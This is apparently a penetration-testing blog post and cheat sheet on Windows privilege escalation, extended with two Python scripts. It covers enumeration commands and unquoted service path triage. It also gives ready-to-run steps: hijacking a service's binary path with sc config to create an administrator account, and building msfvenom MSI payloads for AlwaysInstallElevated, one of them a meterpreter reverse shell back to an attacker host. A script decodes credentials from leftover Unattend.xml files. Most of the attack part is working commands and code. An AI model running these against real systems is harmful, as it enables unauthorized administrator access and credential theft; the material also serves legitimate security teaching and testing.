Privilege Escalation on Windows
2022-05-04
Gather System Information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" - OS name and version (findstr is case-sensitive unless given /I, so the labels must match systeminfo's output exactly)
netstat -ano - active connections and listening ports, with the owning process ID
netsh firewall show state - firewall state
netsh firewall show config - firewall configuration (the netsh firewall context is deprecated; netsh advfirewall show allprofiles is the current equivalent)
schtasks /query /fo LIST /v - scheduled tasks, verbose
tasklist /SVC - running processes and the services hosted in each
net start - started services
DRIVERQUERY - installed drivers
wmic qfe get Caption,Description,HotFixID,InstalledOn - installed hotfixes, for working out which patches are missing
dir /s *password* - searches recursively for files with 'password' in the filename
findstr /si password *.txt - searches the contents of .txt files in the current directory and below for 'password', case-insensitively
icacls [Directory] - shows the ACL of a directory, i.e. what permissions our user and the groups we belong to (Users, Authenticated Users, Everyone) have on it
icacls (Integrity Control Access Control Lists)
- See also: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls
Unquoted Service Paths
This vulnerability arises from the way Windows resolves the path of a service binary. When a service's binary path is not enclosed in double quotes and contains spaces, the service control manager cannot tell where the executable name ends and the arguments begin, so it tries each prefix that ends at a space before the real binary: for C:\Program Files\Some Vendor\svc.exe it first tries C:\Program.exe, then C:\Program Files\Some.exe. If we can plant an executable at one of those earlier paths, it runs under the service's account (usually LocalSystem) the next time the service starts. File paths containing spaces should be double quoted to avoid this confusion.
To the best of my knowledge, there is no downside to quoting file paths, so just always do it.
Requirements:
- A service with an "unquoted" binary path that includes space(s).
- Write permission in one of the directories along that path where a space truncates it (C:\ or C:\Program Files\ in the example above), so we can drop an executable with the truncated name.
- A way to restart the service or reboot the system so the payload is executed.
The following command lists candidate services: those which start automatically, live outside C:\Windows, and have no double quote in their binary path (wmic is deprecated on recent Windows builds; the Win32_Service class it queries can also be read with PowerShell's Get-CimInstance):
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Alternatively, we can query a single service directly and inspect its BINARY_PATH_NAME:
sc qc [service name]
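As an added example (not part of the original post), the following Python script does the same triage offline on output copied from the target: it parses `wmic service get name,pathname,startmode /format:csv`, lists the paths Windows would try before the real binary for each unquoted auto-start service, and checks an icacls listing for write rights held by Users, Authenticated Users or Everyone. The wmic and icacls samples inside it are constructed; the service and directory names are made up.

```python
"""Offline triage of unquoted service paths.

Added example, not from the original post: parses wmic and icacls output
copied off the target, lists the executables Windows would try before the
real service binary, and flags directories where low-privileged groups
hold write rights. SAMPLE_WMIC and SAMPLE_ICACLS are constructed; the
service and directory names in them are made up.
"""
import csv
import re

# Groups a low-privileged local or domain user normally belongs to.
LOW_PRIV_PRINCIPALS = ("BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone")

# icacls right tokens that allow creating or replacing files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW"}


def hijack_candidates(pathname: str) -> list[str]:
    """Return the paths the service control manager tries before the real binary.

    For the unquoted ImagePath  C:\\Program Files\\Some Vendor\\svc.exe -run
    Windows tries C:\\Program.exe, then C:\\Program Files\\Some.exe, then the
    real executable. Quoted paths and paths without spaces give [].
    """
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return []
    # Drop arguments: everything up to the first ".exe" is the binary path.
    match = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)
    exe = match.group(1) if match else pathname
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def find_unquoted_services(wmic_csv: str) -> dict[str, list[str]]:
    """Map auto-start services with unquoted, spaced paths to their candidates.

    Input is the output of: wmic service get name,pathname,startmode /format:csv
    Services under C:\\Windows are skipped, as in the findstr chain above.
    """
    rows = [line for line in wmic_csv.splitlines() if line.strip()]
    findings = {}
    for row in csv.DictReader(rows):
        path = (row.get("PathName") or "").strip()
        if (row.get("StartMode") or "").strip().lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings[row["Name"]] = candidates
    return findings


def writable_by_low_priv(icacls_output: str) -> list[tuple[str, str]]:
    """Return (principal, rights) pairs from icacls output that grant write access.

    Only ACEs for LOW_PRIV_PRINCIPALS are reported and DENY entries are skipped.
    icacls prints the directory path in front of the first ACE; the regex
    tolerates that because it matches the trailing "principal:(rights)" part.
    """
    hits = []
    for line in icacls_output.splitlines():
        match = re.match(r"(\S.*?):(\(.*\))\s*$", line.strip())
        if not match:
            continue
        principal, rights = match.groups()
        flags = {f for grp in re.findall(r"\(([^)]*)\)", rights) for f in grp.split(",")}
        if "DENY" in flags or not flags & WRITE_RIGHTS:
            continue
        for known in LOW_PRIV_PRINCIPALS:
            if principal.endswith(known):
                hits.append((known, rights))
    return hits


# Constructed sample of: wmic service get name,pathname,startmode /format:csv
SAMPLE_WMIC = """\
Node,Name,PathName,StartMode
DESKTOP-TEST,VendorSvc,C:\\Program Files\\Some Vendor\\svc.exe -run,Auto
DESKTOP-TEST,Spooler,C:\\Windows\\System32\\spoolsv.exe,Auto
DESKTOP-TEST,AgentSvc,C:\\Tools\\agent.exe,Auto
DESKTOP-TEST,ManualSvc,C:\\Tools\\My App\\app.exe,Manual
"""

# Constructed sample of: icacls "C:\Program Files\Some Vendor"
SAMPLE_ICACLS = """\
C:\\Program Files\\Some Vendor BUILTIN\\Users:(OI)(CI)(W)
                             NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\\Administrators:(I)(OI)(CI)(F)
                             BUILTIN\\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for service, candidates in find_unquoted_services(SAMPLE_WMIC).items():
        print(f"{service}: Windows tries {candidates} first")
    # Run icacls on the directory of each candidate and feed the output here.
    print("writable by low-priv groups:", writable_by_low_priv(SAMPLE_ICACLS))
```

On a real engagement, run icacls against the directory of every candidate path (C:\ and C:\Program Files\ in the sample) and paste each listing into writable_by_low_priv; a hit on the directory plus a way to restart the service is the full set of requirements listed above.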
Modifiable Service Binary Path
Similar to the unquoted service path vulnerability, if we are able to modify the binary path of a service we can point it at a payload.
- Need permission to change the service's configuration (SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS) for a given service.
A popular tool to check for these permissions is accesschk from Sysinternals; this lists services on which Authenticated Users hold write access:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
It is worth repeating the check for "Users", "Everyone" and the current user's own account and groups.
Exploiting a modifiable binary path to add a new user and grant it administrator rights (note the space after binpath=, which sc requires):
sc config [service name] binpath= "net user admin password /add"
sc stop [service name]
sc start [service name]
sc config [service name] binpath= "net localgroup Administrators admin /add"
sc stop [service name]
sc start [service name]
Each sc start will report an error (typically 1053, the service did not respond in time) because net.exe does not behave like a service binary and never reports back to the service control manager, but by then the command has already run under the service's account, usually LocalSystem. Record the original path from sc qc first and restore it afterwards, since the service is broken until you do.
Available as a Metasploit module:
AlwaysInstallElevated
AlwaysInstallElevated is a Windows Installer policy that lets non-privileged users install Windows Installer packages (MSI files) with elevated permissions: the installation runs as NT AUTHORITY\SYSTEM.
We can use this feature to execute a malicious MSI installer package with those permissions.
We need two registry entries to have been set to
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
We can generate a payload with MSFVenom:
msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi
Or alternatively, a reverse shell:
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
To execute the payload:
msiexec /quiet /qn /i C:\Users\filename.msi
/quiet - quiet mode, no user interaction (it does not bypass UAC; the elevation comes from the AlwaysInstallElevated policy itself)
/qn - no UI
/i - perform a normal installation
Available as a Metasploit module in
Unattended Installs
Unattended installation is a feature which allows Windows to be deployed without active intervention from an administrator: the answers to the setup questions, including local account passwords, are read from an XML answer file.
When an administrator fails to clean up after such an install, that answer file, Unattend.xml, is left on the local system. This file is a goldmine for attackers.
Unattend files are likely found in:
Note: Passwords in these files may be base64 encoded rather than plain text; the PlainText element next to each Value says which. The encoded form is the password with the literal suffix "Password" appended, as UTF-16LE, so decode it and strip that suffix.
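As an added example, not from the original post, here is a Python script that pulls the credentials out of an Unattend.xml offline. The answer file inside it is constructed (the account names and passwords are made up); the decoding rule it applies, base64 of the UTF-16LE password with "Password" appended, is the one Windows uses for these files.

```python
"""Recover credentials from an Unattend.xml answer file.

Added example, not from the original post: parses the answer file offline,
decodes base64 values (Windows stores them as UTF-16LE of the password with
the literal suffix "Password" appended) and returns the accounts found.
SAMPLE_UNATTEND is constructed; its account names and passwords are made up.
"""
import base64
import xml.etree.ElementTree as ET

SUFFIX = "Password"  # appended to the real password before base64 encoding


def decode_unattend_password(value: str, plaintext: bool) -> str:
    """Return the clear-text password for a Value element."""
    if plaintext:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    if decoded.endswith(SUFFIX):
        decoded = decoded[: -len(SUFFIX)]
    return decoded


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem: ET.Element, name: str):
    """Text of the direct child called `name`, ignoring namespace, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def extract_credentials(xml_text: str) -> list[dict]:
    """Find every Password / AdministratorPassword element and decode it.

    The account name comes from the enclosing element: Username for
    AutoLogon, Name for LocalAccount, and the built-in Administrator for
    AdministratorPassword.
    """
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag not in ("Password", "AdministratorPassword"):
            continue
        value = _child_text(elem, "Value")
        if not value:
            continue
        plaintext = (_child_text(elem, "PlainText") or "false").lower() == "true"
        parent = parents.get(elem)
        account = None
        source = tag
        if parent is not None:
            account = _child_text(parent, "Username") or _child_text(parent, "Name")
            if tag == "Password":
                source = _local(parent.tag)
        if tag == "AdministratorPassword":
            account = "Administrator"
        found.append({
            "account": account or "?",
            "password": decode_unattend_password(value, plaintext),
            "source": source,
        })
    return found


# Constructed sample answer file: one encoded and one plain-text password.
SAMPLE_UNATTEND = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <UserAccounts>
        <AdministratorPassword>
          <Value>UABAAHMAcwBQAGEAcwBzAHcAbwByAGQA</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Password>
          <Value>Welcome1</Value>
          <PlainText>true</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_UNATTEND):
        print(f"{cred['source']}: {cred['account']} / {cred['password']}")
```

A value that decodes to exactly "Password" means the account was given an empty password, which the suffix-stripping turns into the empty string rather than a false hit.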
Bypassing UAC
exploit/windows/local/bypassuac is a Metasploit module that bypasses User Account Control (UAC).
User Account Control (UAC) is a security feature on Windows that gives a member of the Administrators group two separate access tokens: a standard user token, used by default, and an administrator token.
When admin access is required, the system prompts the user for approval before executing the program with the admin access token.
The Metasploit module uses a trusted Windows Publisher Certificate to spawn a second shell with the UAC flag turned off, and works on both x86 and x64 platforms. It only applies when the current session already belongs to a user in the local Administrators group (running with the filtered, medium-integrity token); from a plain standard user there is no admin token to unlock, and one of the other techniques above is needed.
- Windows Exploit Suggester
- Compares the target's OS version and installed hotfixes, taken from systeminfo output, against Microsoft's vulnerability database and lists missing patches that have public exploits.
- Note: the database this tool relies on (Microsoft's security bulletin spreadsheet) went EOL in March 2017, so it is only useful against older targets; run the script with --update first to download it.
wmic qfe list full > hotfixes.txt
systeminfo > sysinfo.txt
python windows-exploit-suggester.py --database <current-date>.xls --systeminfo sysinfo.txt --hotfixes hotfixes.txt
Windows Privilege Escalation Awesome Script (WinPEAS)
- winPEAS.exe - requires .NET Framework 4.
- winPEAS.bat - batch version for hosts where the .exe cannot run (no .NET Framework 4).
- Note: both are widely flagged by antivirus, so expect to have to deal with that on defended hosts.